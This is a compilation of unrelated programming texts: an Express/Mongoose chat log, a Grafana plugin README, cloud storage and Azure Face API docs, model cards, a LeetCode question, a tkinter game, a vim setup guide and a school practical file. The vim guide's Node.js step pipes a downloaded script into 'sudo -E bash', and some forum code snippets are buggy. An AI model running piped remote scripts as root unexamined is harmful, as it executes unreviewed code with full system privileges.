}).catch(err => console.error(err) && res.status(400).send(err));
});
router.delete('/api/maxi/:id',function(req,res){
res.send({"type" : "delete"});
});
router.put('/api/maxi/:id',function(req,res){
res.send({"type" : "update"});
});
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<title>maxi</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
</head>
<body>
<input id="search1" placeholder="enter playername">
<input id="search2" placeholder="enter playerscore">
<button class="btn-primary">click</button>
<div class="well"></div>
</body>
<script>
$(document).ready(function(){
$(".btn-primary").click(function(){
console.log("click");
var obj = {
"player" : $("#search1").val(),
"score" : $("#search2").val()
};
$.ajax({
type : "POST",
url : "http://localhost:4000/api/maxi/",
contentType : "application/json",
data : JSON.stringify(obj),
success : function(data){
console.log(data);
$(".well").append("<h1>"+data.player + data.score+"</h1>");
},
error : function(err){
console.log('error' ,err);
},
dataType : "json"
});
});
});
</script>
</html>
```
router.post('/', function (req, res, next) {
var user = new User({
firstName: req.body.firstName,
lastName: req.body.lastName,
password: bcrypt.hashSync(req.body.password, 10),
email: req.body.email
});
user.save(function(err, result) {
if (err) {
// If there is an error, return from this function immediately with
// the error code
return res.status(500).json({
title: 'An error occurred',
error: err
});
}
res.status(201).json({
message: 'Saved User',
obj: result
});
});
});
```
const express = require('express');
const router = express.Router();
const cricketModel = require('../model/score');
router.get('/api/maxi',function(req,res){
res.send({"type" : "get"});
});
router.post('/api/maxi/',function(req,res){
console.log("2");
cricketModel(req.body).save().then(function(data){
res.send(data);
console.log(data);
}).catch(err => console.error(err) && res.status(400).send(err));
});
router.delete('/api/maxi/:id',function(req,res){
res.send({"type" : "delete"});
});
router.put('/api/maxi/:id',function(req,res){
res.send({"type" : "update"});
});
module.exports = router;
@1532j0004kg how about:
```
router.post('/api/maxi/', function (req, res, next) {
    console.log('2');
    console.log(req.body);  // was console.log(body), which is undefined here
    cricketModel.save(function (err, result) {
        if (err) {
            // If there is an error, return from this function immediately with
            // the error code
            return res.status(500).json({
                title: 'An error occurred',
                error: err
            });
        }
        res.status(201).json({
            message: 'Saved User',
            obj: result
        });
    });
});
```
Mongoose: scores.insert({ player: 'q1', score: 1, _id: ObjectId("5a47bd6590f3561
5fc1c5ffe"), __v: 0 })
{ __v: 0, player: 'q1', score: 1, _id: 5a47bd6590f35615fc1c5ffe }
2
Mongoose: scores.insert({ player: 'q1w2', score: 1, _id: ObjectId("5a47bd6c90f35
615fc1c5fff"), __v: 0 })
{ __v: 0,
player: 'q1w2',
score: 1,
_id: 5a47bd6c90f35615fc1c5fff }
2
Mongoose: scores.insert({ player: 'q1w2as', score: 1, _id: ObjectId("5a47bd7390f
35615fc1c6000"), __v: 0 })
{ __v: 0,
player: 'q1w2as',
score: 1,
_id: 5a47bd7390f35615fc1c6000 }
```
router.post('/api/maxi/', function (req, res, next) {
    console.log('2');
    console.log(req.body);  // was console.log(body), which is undefined here
    var cricketModel = new CricketModel({
        firstField: req.body.firstField, // Your model fields here
        lastField: req.body.lastField,
    });
    cricketModel.save(function (err, result) {
        if (err) {
            // If there is an error, return from this function immediately with
            // the error code
            return res.status(500).json({
                title: 'An error occurred',
                error: err
            });
        }
        res.status(201).json({
            message: 'Saved User',
            obj: result
        });
    });
});
```
C:\Users\dinesh\Desktop\app1>scores.find();
'scores.find' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\dinesh\Desktop\app1>mongo.exe
'mongo.exe' is not recognized as an internal or external command,
operable program or batch file.
C:\Users\dinesh\Desktop\app1>start mongo.exe
The system cannot find the file mongo.exe.
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>
> scores.find();
2017-12-30T08:49:19.995-0800 E QUERY [thread1] ReferenceError: scores is not
defined :
@(shell):1:1
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongo
2017-12-30T08:50:02.775-0800 I CONTROL [main] Hotfix KB2731284 or later update
is not installed, will zero-out data files
MongoDB shell version: 3.2.18-4-g752daa3
connecting to: test
Server has startup warnings:
2017-12-30T06:55:07.242-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.242-0800 I CONTROL [initandlisten] ** WARNING: This 32-bit
MongoDB binary is deprecated
2017-12-30T06:55:07.243-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.244-0800 I CONTROL [initandlisten]
2017-12-30T06:55:07.245-0800 I CONTROL [initandlisten] ** NOTE: This is a 32 bi
t MongoDB binary.
2017-12-30T06:55:07.270-0800 I CONTROL [initandlisten] ** 32 bit builds a
re limited to less than 2GB of data (or less with --journal).
2017-12-30T06:55:07.271-0800 I CONTROL [initandlisten] ** Note that journ
aling defaults to off for 32 bit and is currently off.
2017-12-30T06:55:07.272-0800 I CONTROL [initandlisten] ** See http://doch
ub.mongodb.org/core/32bit
2017-12-30T06:55:07.274-0800 I CONTROL [initandlisten]
>
> use database
switched to db database
> scores.find()
2017-12-30T08:52:26.512-0800 E QUERY [thread1] ReferenceError: scores is not
defined :
@(shell):1:1
> collections.find()
2017-12-30T08:52:36.159-0800 E QUERY [thread1] ReferenceError: collections is
not defined :
@(shell):1:1
C:\mongodbs
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongod --dbpath C:\mongodbs
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongo
C:\database_mongo\mongodb-win32-i386-3.2.18-4-g752daa3\bin>mongod --dbpath C:\mo
ngodbs
2017-12-30T08:59:19.588-0800 I CONTROL [main]
2017-12-30T08:59:19.592-0800 W CONTROL [main] 32-bit servers don't have journal
ing enabled by default. Please use --journal if you want durability.
2017-12-30T08:59:19.593-0800 I CONTROL [main]
2017-12-30T08:59:19.602-0800 I CONTROL [main] Hotfix KB2731284 or later update
is not installed, will zero-out data files
2017-12-30T08:59:19.611-0800 I CONTROL [initandlisten] MongoDB starting : pid=3
544 port=27017 dbpath=C:\mongodbs 32-bit host=dinesh007
2017-12-30T08:59:19.614-0800 I CONTROL [initandlisten] targetMinOS: Windows Vis
ta/Windows Server 2008
2017-12-30T08:59:19.615-0800 I CONTROL [initandlisten] db version v3.2.18-4-g75
2daa3
2017-12-30T08:59:19.617-0800 I CONTROL [initandlisten] git version: 752daa30609
5fb1610bb5db13b7b106ac87ec6cb
2017-12-30T08:59:19.618-0800 I CONTROL [initandlisten] allocator: tcmalloc
2017-12-30T08:59:19.619-0800 I CONTROL [initandlisten] modules: none
2017-12-30T08:59:19.622-0800 I CONTROL [initandlisten] build environment:
2017-12-30T08:59:19.623-0800 I CONTROL [initandlisten] distarch: i386
2017-12-30T08:59:19.624-0800 I CONTROL [initandlisten] target_arch: i386
2017-12-30T08:59:19.625-0800 I CONTROL [initandlisten] options: { storage: { db
Path: "C:\mongodbs" } }
2017-12-30T08:59:19.632-0800 E NETWORK [initandlisten] listen(): bind() failed
errno:10048 Only one usage of each socket address (protocol/network address/port
) is normally permitted. for socket: 0.0.0.0:27017
2017-12-30T08:59:19.633-0800 E STORAGE [initandlisten] Failed to set up sockets
during startup.
2017-12-30T08:59:19.635-0800 I CONTROL [initandlisten] dbexit: rc: 48
omgmerrickd sends brownie points to @vasejs and @import :sparkles: :thumbsup: :sparkles:
function palindrome(str) {var x = str.split('').reverse().join('');var y = x.replace(/[\W_]/g, '');var palindr = y.toLowerCase();if ( palindr == str){return true;}else {return false;}
}
palindrome("eye");
sorry vasejs, you can't send brownie points to yourself! :sparkles: :sparkles:
```
function palindrome(str) {
    var x = str.split('').reverse().join('');
    var y = x.replace(/[\W_]/g, '');
    var palindr = y.toLowerCase();
    if ( palindr == str){
        return true;
    }
    else {
        return false;
    }
}
palindrome("eye");
```
sakisbal sends brownie points to @vasejs :sparkles: :thumbsup: :sparkles:
return str.replace(/[\W_]/g, '').toLowerCase()=== str.replace(/[\W_]/g, '').toLowerCase().split('').reverse().join('');
|
Grafana Parity Report
A parity report panel for Grafana.
Overview
This panel shows a parity report for multiple series. A report is presented as a table of rows, where each row shows a custom check expressed as an equation. The series data is reduced to a representative value by means of mathjs functions, along with two extra functions supported by this plugin, namely:
# gives the first datapoint in the series
first()
# gives the last datapoint in the series
last()
Each of these functions takes an alias name generated by the 'alias()' graphite function for queries under the metrics tab. An example of queries having aliases A, B and C is shown below:
alias(test.network.toplevel.traffic.incoming.rate, 'A')
alias(test.network.toplevel.traffic.outgoing.route1.rate, 'B')
alias(test.network.toplevel.traffic.outgoing.route2.rate, 'C')
By default the plugin looks for "target" as the key in the JSON response but it can be changed through the Alias Key field under the options tab. The JSON response from the datasource should be of the following format (with "target" or some other key specified through Alias Key field)
[
{
"target":"A",
"datapoints":[
[100,1450754160000],
[102,1450754210000],
...
]
},
{
"target":"B",
"datapoints":[
[50,1450754160000],
[52,1450754210000],
...
]
},
...
]
These queries can then be used in the custom checks expressed as equations and referred by their aliases A, B and C.
max(A) + min(B) = mean(C) * 2
sum(B) / first(A) * 5 = last(C)
first(A) + var(B) = first(B) + std(C)
derivative("x^2", "x").eval({x: mean(A)}) = hypot(C)
Having defined equations like the ones above, you can set multiple thresholds on the accepted percentage difference between the LHS and RHS of an equation; a breach can be shown in the parity report table as different colors set against the thresholds. The report also shows the percentage difference with configurable precision.
THE ALIAS NAMES MUST BE VALID JAVASCRIPT VARIABLE NAMES
Compatibility
This panel should work with Graphite.
Development
Docker is an easy way to spin up an instance of Grafana. With docker installed, run the following command in the directory containing the plugin; this will expose the local plugin on your machine to the Grafana container so you can test it out.
docker run -it -v $PWD:/var/lib/grafana/plugins/parity_report -p 3000:3000 --name grafana.docker grafana/grafana
Now do this...
# Install development packages
npm install
# Install the grunt-cli
sudo npm install -g grunt-cli
# Compile into dist/
grunt
# Restart Grafana to see it
docker restart grafana.docker
# Watch for changes (requires refresh)
grunt watch
Use grunt test to run the Jasmine tests for the plugin, and grunt eslint to check for style issues. Note that the plugin controller isn't tested because it depends on Grafana native libraries, which aren't available outside of Grafana.
Contributing
For bugs and new features, open an issue and we'll take a look. If you want to contribute to the plugin, you're welcome to submit a pull request - just make sure grunt runs without errors first.
|
This topic describes how to manage the ACLs for objects in a bucket with versioning enabled or suspended.
Set the ACL for an object
PutObjectACL sets the ACL for the current version of the target object by default. If the current version of the target object is a delete marker, the 404 Not Found error is returned. You can set the versionId in the request to set the ACL for a specified version of the target object.
# -*- coding: utf-8 -*-
import oss2
# It is highly risky to log on with the AccessKey of an Alibaba Cloud account because the account has permissions on all the APIs in OSS. We recommend that you log on as a RAM user to access APIs or perform routine operations and maintenance. To create a RAM user account, log on to https://ram.console.aliyun.com.
auth = oss2.Auth('<yourAccessKeyId>', '<yourAccessKeySecret>')
# This example uses the China East 1 (Hangzhou) endpoint. Specify the actual endpoint based on your requirements.
bucket = oss2.Bucket(auth, 'http://oss-cn-hangzhou.aliyuncs.com', '<yourBucketName>')
# Sets the ACL for a specified version of the object. In this example, the ACL for the object is modified to public-read.
params = dict()
params['versionId'] = '<yourObjectVersionId>'
result = bucket.put_object_acl('<yourObjectName>', oss2.OBJECT_ACL_PUBLIC_READ, params=params)
# Views the version ID of the object for which the ACL is modified.
print('set acl object versionid:', result.versionid)
For more information about setting the ACL for an object, see PutObjectACL.
Obtain the ACL for an object
GetObjectACL obtains the ACL for the current version of the target object by default. If the current version of the object is a delete marker, the 404 Not Found error is returned. You can specify the versionId in the request to obtain the ACL for a specified version of the target object.
# -*- coding: utf-8 -*-
import oss2
# It is highly risky to log on with the AccessKey of an Alibaba Cloud account because the account has permissions on all the APIs in OSS. We recommend that you log on as a RAM user to access APIs or perform routine operations and maintenance. To create a RAM user account, log on to https://ram.console.aliyun.com.
auth = oss2.Auth('<yourAccessKeyId>', '<yourAccessKeySecret>')
# This example uses the China East 1 (Hangzhou) endpoint. Specify the actual endpoint based on your requirements.
bucket = oss2.Bucket(auth, 'http://oss-cn-hangzhou.aliyuncs.com', '<yourBucketName>')
# Obtains the ACL for a specified version of the object.
params = dict()
params['versionId'] = '<yourObjectVersionId>'
result = bucket.get_object_acl('<yourObjectName>', params=params)
# Views the obtained ACL for the specified version of the object.
print('get object acl :', result.acl)
# Views the version ID of the object for which the ACL is obtained.
print('object version id:', result.versionid)
For more information about obtaining the ACL for an object, see GetObjectACL.
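If you do not know the version ID, you can list the versions of the objects in the bucket first. A short sketch, assuming the list_object_versions method available in recent versions of the oss2 SDK:

# Lists object versions and prints each object's key and version ID.
result = bucket.list_object_versions()
for version_info in result.versions:
    print(version_info.key, version_info.versionid)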
|
As a new Python programmer, I have the following question, and my corresponding solution, for the LeetCode question Number of Islands:
Given a 2D grid map of '1's (land) and '0's (water), count the number of islands. An island is surrounded by water and is formed by connecting adjacent lands horizontally or vertically. You may assume all four edges of the grid are surrounded by water.
Example:
Input:
11110
11010
11000
00000
Output: 1
Solution:
from typing import List

class Solution:
    def numIslands(self, grid: List[List[str]]) -> int:
        rmax = len(grid)
        if rmax == 0:
            return 0
        cmax = len(grid[0])
        island = 0
        def DFS(grid, r, c, rmax, cmax):
            grid[r][c] = '0'   # sink the current cell so it is not visited again
            if r+1 < rmax and grid[r+1][c] == '1':
                DFS(grid, r+1, c, rmax, cmax)
            if r-1 >= 0 and grid[r-1][c] == '1':
                DFS(grid, r-1, c, rmax, cmax)
            if c+1 < cmax and grid[r][c+1] == '1':
                DFS(grid, r, c+1, rmax, cmax)
            if c-1 >= 0 and grid[r][c-1] == '1':
                DFS(grid, r, c-1, rmax, cmax)
        for r in range(rmax):
            for c in range(cmax):
                if grid[r][c] == '1':
                    DFS(grid, r, c, rmax, cmax)
                    island += 1
        return island
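A minimal driver to try the solution on the example above (the grid literal is my own):

grid = [list("11110"), list("11010"), list("11000"), list("00000")]
print(Solution().numIslands(grid))   # prints 1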
Can any expert let me know what the base case is in the DFS function?
|
bert-base-hi-cased
We are sharing smaller versions of bert-base-multilingual-cased that handle a custom number of languages.
Unlike distilbert-base-multilingual-cased, our versions give exactly the same representations produced by the original model, which preserves the original accuracy.
For more information please visit our paper: Load What You Need: Smaller Versions of Multilingual BERT.
How to use
from transformers import AutoTokenizer, AutoModel
tokenizer = AutoTokenizer.from_pretrained("Geotrend/bert-base-hi-cased")
model = AutoModel.from_pretrained("Geotrend/bert-base-hi-cased")
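A quick smoke test of the snippet above (the Hindi sample sentence is mine; attribute access assumes a recent transformers version):

inputs = tokenizer("नमस्ते दुनिया", return_tensors="pt")
outputs = model(**inputs)
print(outputs.last_hidden_state.shape)   # (batch_size, sequence_length, hidden_size)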
To generate other smaller versions of multilingual transformers please visit our Github repo.
How to cite
@inproceedings{smallermbert,
title={Load What You Need: Smaller Versions of Multilingual BERT},
author={Abdaoui, Amine and Pradel, Camille and Sigel, Grégoire},
booktitle={SustaiNLP / EMNLP},
year={2020}
}
Contact
Please contact amine@geotrend.fr for any question, feedback or request.
|
Twitter-roBERTa-base for Offensive Language Identification
This is a roBERTa-base model trained on ~58M tweets and finetuned for offensive language identification with the TweetEval benchmark.
Example of classification
from transformers import AutoModelForSequenceClassification
from transformers import TFAutoModelForSequenceClassification
from transformers import AutoTokenizer
import numpy as np
from scipy.special import softmax
import csv
import urllib.request
# Preprocess text (username and link placeholders)
def preprocess(text):
    new_text = []
    for t in text.split(" "):
        t = '@user' if t.startswith('@') and len(t) > 1 else t
        t = 'http' if t.startswith('http') else t
        new_text.append(t)
    return " ".join(new_text)
# Tasks:
# emoji, emotion, hate, irony, offensive, sentiment
# stance/abortion, stance/atheism, stance/climate, stance/feminist, stance/hillary
task='offensive'
MODEL = f"cardiffnlp/twitter-roberta-base-{task}"
tokenizer = AutoTokenizer.from_pretrained(MODEL)
# download label mapping
labels=[]
mapping_link = f"https://raw.githubusercontent.com/cardiffnlp/tweeteval/main/datasets/{task}/mapping.txt"
with urllib.request.urlopen(mapping_link) as f:
    html = f.read().decode('utf-8').split("\n")
csvreader = csv.reader(html, delimiter='\t')
labels = [row[1] for row in csvreader if len(row) > 1]
# PT
model = AutoModelForSequenceClassification.from_pretrained(MODEL)
model.save_pretrained(MODEL)
text = "Good night 😊"
text = preprocess(text)
encoded_input = tokenizer(text, return_tensors='pt')
output = model(**encoded_input)
scores = output[0][0].detach().numpy()
scores = softmax(scores)
# # TF
# model = TFAutoModelForSequenceClassification.from_pretrained(MODEL)
# model.save_pretrained(MODEL)
# text = "Good night 😊"
# encoded_input = tokenizer(text, return_tensors='tf')
# output = model(encoded_input)
# scores = output[0][0].numpy()
# scores = softmax(scores)
ranking = np.argsort(scores)
ranking = ranking[::-1]
for i in range(scores.shape[0]):
    l = labels[ranking[i]]
    s = scores[ranking[i]]
    print(f"{i+1}) {l} {np.round(float(s), 4)}")
Output:
1) not-offensive 0.9073
2) offensive 0.0927
|
Face API - v1.0
This API is currently available in:
Australia East - australiaeast.api.cognitive.microsoft.com
Brazil South - brazilsouth.api.cognitive.microsoft.com
Canada Central - canadacentral.api.cognitive.microsoft.com
Central India - centralindia.api.cognitive.microsoft.com
Central US - centralus.api.cognitive.microsoft.com
East Asia - eastasia.api.cognitive.microsoft.com
East US - eastus.api.cognitive.microsoft.com
East US 2 - eastus2.api.cognitive.microsoft.com
France Central - francecentral.api.cognitive.microsoft.com
Japan East - japaneast.api.cognitive.microsoft.com
Japan West - japanwest.api.cognitive.microsoft.com
Korea Central - koreacentral.api.cognitive.microsoft.com
North Central US - northcentralus.api.cognitive.microsoft.com
North Europe - northeurope.api.cognitive.microsoft.com
South Africa North - southafricanorth.api.cognitive.microsoft.com
South Central US - southcentralus.api.cognitive.microsoft.com
Southeast Asia - southeastasia.api.cognitive.microsoft.com
UK South - uksouth.api.cognitive.microsoft.com
West Central US - westcentralus.api.cognitive.microsoft.com
West Europe - westeurope.api.cognitive.microsoft.com
West US - westus.api.cognitive.microsoft.com
West US 2 - westus2.api.cognitive.microsoft.com
UAE North - uaenorth.api.cognitive.microsoft.com
FaceList - List
List face lists' faceListId, name, userData and recognitionModel.
To get the face information inside a face list, use FaceList - Get.
Http Method
GET
Request URL
GET https://{endpoint}/face/v1.0/facelists[?returnRecognitionModel]
Request parameters
returnRecognitionModel (optional): Return 'recognitionModel' or not. The default value is false.
Request headers
Ocp-Apim-Subscription-Key: Subscription key which provides access to this API.
Request body
The request body should be empty.
Response 200
A successful call returns an array of faceList.
JSON fields in response body:
Fields Type Description
faceListId String Face list ID
name String Face list name which user assigned
userData String User-provided data attached to the face list
recognitionModel String The 'recognitionModel' associated with this face list. This is only returned when 'returnRecognitionModel' is explicitly set as true.
[
{
"faceListId": "sample_list",
"name": "list1",
"userData": "User-provided data attached to the face list.",
"recognitionModel": "recognition_03"
},
…
]
Response 401
Error code and message returned in JSON:
Error Code: Unspecified. Error Message: Invalid subscription key or user/plan is blocked.
{
"error": {
"code": "Unspecified",
"message": "Access denied due to invalid subscription key. Make sure you are subscribed to an API you are trying to call and provide the right key."
}
}
Response 403
{
"error": {
"statusCode": 403,
"message": "Out of call volume quota. Quota will be replenished in 2 days."
}
}
Response 429
{
"error": {
"statusCode": 429,
"message": "Rate limit is exceeded. Try again in 26 seconds."
}
}
Code samples
@ECHO OFF
curl -v -X GET "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists?returnRecognitionModel=false"
-H "Ocp-Apim-Subscription-Key: {subscription key}"
--data-ascii "{body}"
using System;
using System.Net.Http.Headers;
using System.Text;
using System.Net.Http;
using System.Web;
namespace CSHttpClientSample
{
static class Program
{
static void Main()
{
MakeRequest();
Console.WriteLine("Hit ENTER to exit...");
Console.ReadLine();
}
static async void MakeRequest()
{
var client = new HttpClient();
var queryString = HttpUtility.ParseQueryString(string.Empty);
// Request headers
client.DefaultRequestHeaders.Add("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request parameters
queryString["returnRecognitionModel"] = "false";
var uri = "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists?" + queryString;
var response = await client.GetAsync(uri);
}
}
}
// // This sample uses the Apache HTTP client from HTTP Components (http://hc.apache.org/httpcomponents-client-ga/)
import java.net.URI;
import org.apache.http.HttpEntity;
import org.apache.http.HttpResponse;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.client.utils.URIBuilder;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;
public class JavaSample
{
public static void main(String[] args)
{
HttpClient httpclient = HttpClients.createDefault();
try
{
URIBuilder builder = new URIBuilder("https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists");
builder.setParameter("returnRecognitionModel", "false");
URI uri = builder.build();
HttpGet request = new HttpGet(uri);
request.setHeader("Ocp-Apim-Subscription-Key", "{subscription key}");
// Request body
StringEntity reqEntity = new StringEntity("{body}");
request.setEntity(reqEntity);
HttpResponse response = httpclient.execute(request);
HttpEntity entity = response.getEntity();
if (entity != null)
{
System.out.println(EntityUtils.toString(entity));
}
}
catch (Exception e)
{
System.out.println(e.getMessage());
}
}
}
<!DOCTYPE html>
<html>
<head>
<title>JSSample</title>
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.9.0/jquery.min.js"></script>
</head>
<body>
<script type="text/javascript">
$(function() {
var params = {
// Request parameters
"returnRecognitionModel": "false",
};
$.ajax({
url: "https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists?" + $.param(params),
beforeSend: function(xhrObj){
// Request headers
xhrObj.setRequestHeader("Ocp-Apim-Subscription-Key","{subscription key}");
},
type: "GET",
// Request body
data: "{body}",
})
.done(function(data) {
alert("success");
})
.fail(function() {
alert("error");
});
});
</script>
</body>
</html>
#import <Foundation/Foundation.h>
int main(int argc, const char * argv[])
{
NSAutoreleasePool * pool = [[NSAutoreleasePool alloc] init];
NSString* path = @"https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists";
NSArray* array = @[
// Request parameters
@"entities=true",
@"returnRecognitionModel=false",
];
NSString* string = [array componentsJoinedByString:@"&"];
path = [path stringByAppendingFormat:@"?%@", string];
NSLog(@"%@", path);
NSMutableURLRequest* _request = [NSMutableURLRequest requestWithURL:[NSURL URLWithString:path]];
[_request setHTTPMethod:@"GET"];
// Request headers
[_request setValue:@"{subscription key}" forHTTPHeaderField:@"Ocp-Apim-Subscription-Key"];
// Request body
[_request setHTTPBody:[@"{body}" dataUsingEncoding:NSUTF8StringEncoding]];
NSURLResponse *response = nil;
NSError *error = nil;
NSData* _connectionData = [NSURLConnection sendSynchronousRequest:_request returningResponse:&response error:&error];
if (nil != error)
{
NSLog(@"Error: %@", error);
}
else
{
NSError* error = nil;
NSMutableDictionary* json = nil;
NSString* dataString = [[NSString alloc] initWithData:_connectionData encoding:NSUTF8StringEncoding];
NSLog(@"%@", dataString);
if (nil != _connectionData)
{
json = [NSJSONSerialization JSONObjectWithData:_connectionData options:NSJSONReadingMutableContainers error:&error];
}
if (error || !json)
{
NSLog(@"Could not parse loaded json with error:%@", error);
}
NSLog(@"%@", json);
_connectionData = nil;
}
[pool drain];
return 0;
}
<?php
// This sample uses the Apache HTTP client from HTTP Components (http://hc.apache.org/httpcomponents-client-ga/)
require_once 'HTTP/Request2.php';
$request = new Http_Request2('https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists');
$url = $request->getUrl();
$headers = array(
// Request headers
'Ocp-Apim-Subscription-Key' => '{subscription key}',
);
$request->setHeader($headers);
$parameters = array(
// Request parameters
'returnRecognitionModel' => 'false',
);
$url->setQueryVariables($parameters);
$request->setMethod(HTTP_Request2::METHOD_GET);
// Request body
$request->setBody("{body}");
try
{
$response = $request->send();
echo $response->getBody();
}
catch (HttpException $ex)
{
echo $ex;
}
?>
########### Python 2.7 #############
import httplib, urllib, base64
headers = {
    # Request headers
    'Ocp-Apim-Subscription-Key': '{subscription key}',
}
params = urllib.urlencode({
    # Request parameters
    'returnRecognitionModel': 'false',
})
try:
    conn = httplib.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
    conn.request("GET", "/face/v1.0/facelists?%s" % params, "{body}", headers)
    response = conn.getresponse()
    data = response.read()
    print(data)
    conn.close()
except Exception as e:
    print("[Errno {0}] {1}".format(e.errno, e.strerror))
####################################
########### Python 3.2 #############
import http.client, urllib.request, urllib.parse, urllib.error, base64
headers = {
    # Request headers
    'Ocp-Apim-Subscription-Key': '{subscription key}',
}
params = urllib.parse.urlencode({
    # Request parameters
    'returnRecognitionModel': 'false',
})
try:
    conn = http.client.HTTPSConnection('northeurope.api.cognitive.microsoft.com')
    conn.request("GET", "/face/v1.0/facelists?%s" % params, "{body}", headers)
    response = conn.getresponse()
    data = response.read()
    print(data)
    conn.close()
except Exception as e:
    print("[Errno {0}] {1}".format(e.errno, e.strerror))
####################################
require 'net/http'
uri = URI('https://northeurope.api.cognitive.microsoft.com/face/v1.0/facelists')
uri.query = URI.encode_www_form({
# Request parameters
'returnRecognitionModel' => 'false'
})
request = Net::HTTP::Get.new(uri.request_uri)
# Request headers
request['Ocp-Apim-Subscription-Key'] = '{subscription key}'
# Request body
request.body = "{body}"
response = Net::HTTP.start(uri.host, uri.port, :use_ssl => uri.scheme == 'https') do |http|
http.request(request)
end
puts response.body
|
My first graphical application with Python and the tkinter library
#!/usr/bin/python3.2
import tkinter
from tkinter import *
import random

window = tkinter.Tk()
window.geometry("410x70")
window.title("Adivina el numero")
window.configure(bg = "gray")

Texto = tkinter.Label(window, text = "Adivina el numero", font = "Monospace, 15", bg="gray")
Texto.grid(row = 1, column = 1)

NumberImput = tkinter.Entry(window, width="15", fg="blue")
NumberImput.grid(row = 1, column = 2)

NumeroBot = random.randint(1, 9999)   # the number the player has to guess
Indicador = ""

def Form():
    global NumberImput
    global window
    global Indicador
    global NumeroBot
    NumeroOfPersona = int(NumberImput.get())   # read the player's guess
    print(NumeroOfPersona)
    if NumeroOfPersona == NumeroBot:
        print("Lo lograste")
        Indicador = "Lo Lograste"
        window2 = tkinter.Tk()
        GanasteTexto = tkinter.Label(window2, text = "Ganaste, Felicidades", font = "Monospace, 50", bg = "orange", fg="blue")
        GanasteTexto.grid()
        window2.title('Ganaste!')
        window2.mainloop()
    if NumeroOfPersona > NumeroBot:
        print("Un numero mas bajo porfavor")
        Indicador = "Un Numero Mas Bajo Porfavor"
    if NumeroOfPersona < NumeroBot:
        print("Un Numero Mas alto porfavor")
        Indicador = "Un Numero mas alto Porfavor"
    Pistero = tkinter.Label(window, text = Indicador, bg="#fff")   # hint label
    Pistero.grid(row = 2, column = 1)

botonGet = tkinter.Button(text = "Aplastame", bg = "orange", command = Form, fg="yellow")
botonGet.grid(row = 1, column = 3)

window.mainloop()
|
This is an extension to my first vim-ide post, but this part focuses on the setup of intellisense features that increase coding performance, like scanning for errors, autocompletion, refactoring and more.
install languages to the system
Install the languages/tools your vim will need to support. If your language is constantly updated, your distribution may not have the latest package; for example, ubuntu generally has versions of nodejs and npm that aren't compatible with each other.
javascript
curl -sL https://deb.nodesource.com/setup_14.x | sudo -E bash -
sudo apt-get install -y nodejs
python interpreter, pip3 package manager
sudo apt install -y python3 python3-pip
texlive cross-platform latex system, latexmk compiler
sudo apt install texlive-latex-extra
sudo apt install latexmk
plugins
linters and fixers
Linters are programs that scan a file for errors and style problems in your code and then present those errors to you.
Fixers detect style problems (and maybe some errors) and automatically fix them when a certain condition is met, for example every time you save the file.
Using multiple linter/fixer plugins and configuring them can be difficult, so it's better to use a large all-in-one solution. Ale is a plugin that lints asynchronously, so it will run scans every time you change vim mode.
Linter and fixer programs generally apply to one language, so we will need at least one per language.
install
install the linters and fixers
javascript
Eslint can serve as a linter and a fixer.
sudo npm install eslint -g
python
Pyflakes just lints for errors, and the Python Software Foundation's black autoformats code to conform to official style rules.
pip3 install pyflakes
pip3 install black
latex
Depending on which tex package you downloaded, some linters may already be installed.
sudo apt install chktex
sudo apt install lacheck
If you can't find a linter or fixer, check ALE's linter scripts; all supported linters will be there: https://github.com/dense-analysis/ale/tree/master/ale_linters
config vim
then tell ale to use them in vimrc
let g:ale_linters = {
\    'javascript': ['eslint'],
\    'python': ['pyflakes'],
\    'tex': ['chktex', 'lacheck'],
\}
let g:ale_fixers = {
\    '*': ['remove_trailing_lines'],
\    'javascript': ['eslint'],
\    'python': ['black'],
\}
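To have the fixers run automatically every time you save (as described above), ALE provides a toggle you can add alongside these settings in your vimrc:
let g:ale_fix_on_save = 1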
language servers (LSPs)
Microsoft's Language Server Protocol uses a server to provide intellisense to the editor (client). Since the functionality isn't built straight into the editor, it can easily be implemented across many editors. The main LSP functionality is autocomplete, but most provide many more features: go to definition, refactor, lint, …
coc.nvim
Vim needs a plugin to act as a client for the language server. Coc.nvim is one that is under active development and offers many language servers from VS Code extensions.
LSPs
Coc.nvim has lsps to support most languages and most LSPs can be installed without any configuration as an extension via
:CocInstall coc-lspname
javascript (and typescript)
https://github.com/neoclide/coc-tsserver
:CocInstall coc-tsserver
python
https://github.com/neoclide/coc-python
:CocInstall coc-python
https://github.com/fannheyward/coc-pyright
:CocInstall coc-pyright
others
If you can't find a working/compatible linter/fixer/LSP for a language, or need more functionality, you can get an individual plugin for that language.
For example vimtex for latex.
https://github.com/lervag/vimtex
Features
live preview latex documents from a variety of pdf viewers
key bindings to navigate documents quicker
better syntax highlighting
You may also need additional packages; vimtex requires latexmk to compile documents.
|
In this article, you will get the 10 best programs for the Class 12 Computer practical file. These programs can be useful for your practical file for the board examination.
Here we provide the code of assignment questions shared earlier.
10 best Programs for Computer practical file Class 12
Let’s start the article Computer practical file Class 12 with basic function programs.
1. Write a python program to perform the basic arithmetic operations in a menu-driven program with different functions. The output should be like this:
Select an operator to perform the task:
‘+’ for Addition
‘-‘ for Subtraction
‘*’ for Multiplication
‘/’ for Division
def main():
print('+ for Addition')
print('- for Subtraction')
print('* for Multiplication')
